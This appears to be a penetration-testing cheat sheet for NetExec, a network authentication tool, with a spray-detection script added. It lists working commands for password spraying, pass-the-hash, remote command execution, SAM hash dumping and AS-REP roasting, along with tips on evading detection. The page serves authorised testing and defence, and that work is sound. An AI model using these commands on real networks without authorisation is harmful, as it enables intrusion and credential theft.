Network protocol authentication and post-exploitation — SMB, WinRM, MSSQL, LDAP, RDP, SSH, FTP all in one tool.
Installation
Pick the install method that matches your stack. The Docker option is the cleanest for one-off scans where you don’t want to pollute your workstation.
pipx
pipx install netexec
Linux (apt — older CME)
sudo apt install crackmapexec
Source
pipx install git+https://github.com/Pennyw0rth/NetExec
Core commands
The handful of invocations you’ll actually run on 90% of engagements:
Validate creds across subnet
netexec smb 10.0.0.0/24 -u admin -p pass
Password spray
netexec smb 10.0.0.0/24 -u users.txt -p Spring2026 --continue-on-success
Pass-the-Hash check
netexec smb 10.0.0.0/24 -u admin -H aad3b435...
Run command via WinRM
netexec winrm 10.0.0.5 -u admin -p pass -x whoami
Dump SAM hashes (admin)
netexec smb 10.0.0.5 -u admin -p pass --sam
Find shares + permissions
netexec smb 10.0.0.0/24 -u u -p p --shares
LDAP enum (machine accounts, AS-REP-roastable users, etc.)
netexec ldap 10.0.0.1 -u u -p p --asreproast out.txt
Performance optimisation
What separates a junior who runs the default invocation from a practitioner who knows the knobs:
- --threads 100 for network-wide spray (default 100 — usually fine).
- --jitter 1-5 randomises delay between hosts — evades simple rate-based detection.
- --continue-on-success sprays full list even after a hit — finds multiple compromised accounts.
- -d uses DNS instead of explicit subnet — useful when target is a domain.
- --enabled filters to enabled accounts only — saves time on stale users.
Common pitfalls
Real failure modes that bite people on engagements. Most are recoverable; a few are reputation-damaging.
- Password spraying triggers account lockouts — check policy first via --pass-pol.
- --sam on multiple hosts crashes some Windows versions (rare). One at a time on production.
- Default UA includes “NetExec” — Defender for Identity (Azure ATP) flags this.
- Successful auth is logged as Event 4624 — SOCs see this. Schedule sprays during high-noise hours.
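The lockout and Event 4624 points above describe the same thing from the other side of the fence: a spray is one source authenticating against many distinct accounts in a short time, and that is exactly what a SOC rule keys on. The following Python detector is an added illustration and is not NetExec code nor part of the original page. It assumes Security events have already been exported as dicts carrying EventID (4624 success, 4625 failure), TargetUserName, IpAddress, LogonType and an ISO 8601 TimeCreated; the thresholds and every sample record are constructed for the example.

```python
"""Password-spray detector over Windows Security events.

Added example, not part of NetExec or the original page. Assumes events are
already exported as dicts carrying EventID (4624 = success, 4625 = failure),
TargetUserName, IpAddress, LogonType and an ISO 8601 TimeCreated. The field
names follow the Security log schema; the thresholds and all sample records
below are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SPRAY_MIN_USERS = 5                 # distinct accounts from one source inside the window
SPRAY_WINDOW = timedelta(minutes=10)
NETWORK_LOGON = 3                   # SMB/WinRM authentication shows up as logon type 3


def _ev(event_id, user, ip, when, logon_type=NETWORK_LOGON):
    """Build one constructed event record."""
    return {"EventID": event_id, "TargetUserName": user, "IpAddress": ip,
            "LogonType": logon_type, "TimeCreated": when}


# Constructed sample log: a spray from 10.0.0.99 that keeps going after two hits
# (the --continue-on-success pattern), a benign user mistyping a password from
# 10.0.0.7, an interactive console logon, and a very slow spray from 10.0.0.50.
SAMPLE_EVENTS = [
    _ev(4625, "alice", "10.0.0.99", "2026-03-01T09:00:01"),
    _ev(4625, "bob",   "10.0.0.99", "2026-03-01T09:00:02"),
    _ev(4624, "carol", "10.0.0.99", "2026-03-01T09:00:03"),
    _ev(4625, "dave",  "10.0.0.99", "2026-03-01T09:00:04"),
    _ev(4625, "erin",  "10.0.0.99", "2026-03-01T09:00:05"),
    _ev(4624, "frank", "10.0.0.99", "2026-03-01T09:00:06"),
    _ev(4625, "alice", "10.0.0.7",  "2026-03-01T09:01:00"),
    _ev(4625, "alice", "10.0.0.7",  "2026-03-01T09:01:20"),
    _ev(4624, "alice", "10.0.0.7",  "2026-03-01T09:01:40"),
    _ev(4624, "gina",  "-",         "2026-03-01T09:02:00", logon_type=2),
    _ev(4625, "alice", "10.0.0.50", "2026-03-01T10:00:00"),
    _ev(4625, "bob",   "10.0.0.50", "2026-03-01T10:15:00"),
    _ev(4625, "carol", "10.0.0.50", "2026-03-01T10:30:00"),
    _ev(4625, "dave",  "10.0.0.50", "2026-03-01T10:45:00"),
    _ev(4625, "erin",  "10.0.0.50", "2026-03-01T11:00:00"),
]


def parse_events(raw_events):
    """Keep only network logon results and attach a parsed timestamp to each."""
    parsed = []
    for e in raw_events:
        if e["EventID"] not in (4624, 4625) or e["LogonType"] != NETWORK_LOGON:
            continue
        parsed.append({**e, "ts": datetime.fromisoformat(e["TimeCreated"])})
    return parsed


def detect_sprays(raw_events, min_users=SPRAY_MIN_USERS, window=SPRAY_WINDOW):
    """Return {source_ip: summary} for every source that authenticated against
    at least `min_users` distinct accounts within any span of length `window`.

    The summary is computed over all of that source's network logon events so
    that successes after the trigger point (accounts the spray actually got
    into) are reported as well."""
    by_ip = defaultdict(list)
    for e in parse_events(raw_events):
        by_ip[e["IpAddress"]].append(e)

    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end, cur in enumerate(evs):
            # Slide the window start forward until the span fits inside `window`.
            while cur["ts"] - evs[start]["ts"] > window:
                start += 1
            users_in_window = {e["TargetUserName"].lower() for e in evs[start:end + 1]}
            if len(users_in_window) < min_users:
                continue
            alerts[ip] = {
                "distinct_users": len({e["TargetUserName"].lower() for e in evs}),
                "failures": sum(1 for e in evs if e["EventID"] == 4625),
                "compromised": sorted({e["TargetUserName"].lower()
                                       for e in evs if e["EventID"] == 4624}),
                "first_seen": evs[0]["ts"].isoformat(),
                "last_seen": evs[-1]["ts"].isoformat(),
            }
            break
    return alerts


if __name__ == "__main__":
    for ip, summary in detect_sprays(SAMPLE_EVENTS).items():
        print(f"SPRAY from {ip}: {summary}")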
Modern alternatives in 2026
The ecosystem moves fast. These are tools you should at least be aware of:
- Impacket scripts — lower-level, more control.
- kerbrute — Kerberos username enum specifically.
India context and engagement notes
NetExec is the day-1 tool on internal pen-tests. First command after getting on the network: netexec smb $(prips $CIDR) -u guest -p '' --shares to find anonymous-readable shares. India-stack: surprisingly common to find FINANCE$ / HR$ shares with EVERYONE-Read in mid-size companies.
⚖️ Legal: Use only on systems you own or have explicit written authorisation to test. In India, unauthorised access is punishable under Section 66 of the IT Act, 2000 (up to 3 years imprisonment + fine). Pair every engagement with a signed Statement of Work or Rules of Engagement before running anything from this page.
Custom team training + practitioner advisory
Beyond the free academy — we run private workshops, vCISO advisory, and red-team exercises tailored to your stack. For Indian SMBs scaling past their first hire.